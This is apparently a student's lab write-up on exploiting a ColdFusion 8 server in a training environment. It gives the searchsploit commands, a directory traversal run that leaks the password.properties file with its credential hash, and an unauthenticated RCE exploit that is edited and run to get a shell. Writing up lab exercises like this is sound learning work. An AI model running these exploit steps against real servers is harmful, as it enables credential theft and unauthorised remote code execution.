# Intro - Based on the previous section, we know that the ColdFusion instance is version 8 - Run `searchsploit` to identify any PoCs that apply to version 8 ![[images/Pasted image 20260128202603.png]] - There is an RCE for version 8 ```bash searchsploit coldfusion ``` # Directory Traversal Exploit - Copy this exploit to local directory ![[images/Pasted image 20260128203140.png]] ```bash sudo searchsploit -m 14641 ``` - View the exploit ![[images/Pasted image 20260128203307.png]] - As shown above and below, the script ingests 3 arguments: host port file_path - Notice that `python3` does not work but 2 and 2.7 do work ![[images/Pasted image 20260128203732.png]] - Let's try to disclose `ColdFusion8/lib/password.properties` with the below command ```bash python2.7 14641.py 10.129.204.230 8500 "../../../../../../../../ColdFusion8/lib/password.properties" ------------------------------ trying /CFIDE/wizards/common/_logintowizard.cfm title from server in /CFIDE/wizards/common/_logintowizard.cfm: ------------------------------ #Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true ------------------------------ ... ``` ## Unauthenticated RCE Exploit - Copy this exploit to local directory ![[images/Pasted image 20260128204002.png]] ```bash sudo searchsploit -m 50057 ``` - View the exploit ![[images/Pasted image 20260128204058.png]] - Looks like we need to fill in the blanks here ![[images/Pasted image 20260128204143.png]] # Exercise ## Run the RCE exploit against the target - Edit `50057.py` as below ![[images/Pasted image 20260128204331.png]] - Run the exploit and wait a bit![[images/Pasted image 20260128204426.png]] ```bash sudo python3 50057.py ``` - Success! - We have a shell on the webserver ![[images/Pasted image 20260128204531.png]]